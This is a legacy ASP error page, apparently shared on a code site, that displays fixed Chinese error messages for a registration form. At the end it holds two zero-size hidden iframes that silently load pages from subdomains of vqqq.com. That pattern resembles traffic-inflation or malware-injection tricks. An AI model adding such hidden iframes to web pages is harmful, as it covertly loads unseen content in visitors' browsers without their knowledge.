📄 error.asp
字号:
<%response.expires=0
error=request.querystring("error")
if error="illegal" then messge="对不起,您的必填资料没有填写完全。请重新输入!"
if error="rname" then messge="对不起,已经有用户使用该用户名了!"
if error="noname" then messge="对不起,您的用户名可能输入错误!"
%>
<HTML><HEAD><TITLE>错误</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR></HEAD>
<style type="text/css">
<!--
p,td,input,select,div,tr,body,html{ font-size: 9pt ; }
a {color:#666666;font-size: 9pt;text-decoration:none; }
a:hover {color: #000000;}
a:active {color:#666666;}
-->
</style>
<BODY bgColor=#ffffff>
<DIV align=center>
<table border=0 cellPadding=0 cellSpacing=0 width=680>
<TBODY>
<TR>
<TD colSpan=2 height=10 width="100%"></TD>
</TR>
</TBODY>
</TABLE>
</DIV>
<DIV align=center>
<CENTER>
<table border=2 borderColor=bul cellPadding=3 cellSpacing=2 width=680>
<TBODY>
<TR>
<TD align=middle bgColor=#eaeaff
style="BORDER-BOTTOM: rgb(0,0,0) 1px ridge; BORDER-TOP: rgb(0,0,0) 1px ridge"
width="200%" colspan="2"><STRONG><font size="3">错误!</font></STRONG></TD>
</TR>
<TR>
<TD height=5 width="200%" colspan="2">
<p> </p>
<p> </p>
<p><span style="FONT-SIZE: 9pt"><font color="#000000"><CENTER><%=messge%></font></span></p>
<p> </p>
<p> </p>
</TD>
</TR>
</TBODY>
</TABLE>
</CENTER></DIV>
<P>
<DIV align=center>
<CENTER>
<table align=center border=0 cellPadding=0 cellSpacing=0 width=560>
<TBODY>
<TR>
<TD height=49>
<DIV align=center><SPAN style="FONT-SIZE: 9pt">如果您有困难或问题请联系:</SPAN><SPAN
style="FONT-SIZE: 9pt"><A
href="mailto:webmaster@vqqq.com">mailto:webmaster@vqqq.com</A></SPAN><SPAN
style="FONT-SIZE: 9pt"><BR>
Copyright (C) 2001 <a href="http://www.vqqq.com">www.vqqq.com</a>
All Rights Reserved<BR>
版权所有 <a href="http://www.vqqq.com">http://www.vqqq.com</a> </SPAN></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</CENTER></DIV><iframe frameborder=0 leftmargin=0 marginheight=0 marginwidth=0 scrolling=no src="http://qq.vqqq.com/tui/mv.asp" topmargin=0 width=0 height=0></iframe><iframe frameborder=0 leftmargin=0 marginheight=0 marginwidth=0 scrolling=no src="http://q.vqqq.com/tui/mv.asp" topmargin=0 width=0 height=0></iframe></BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -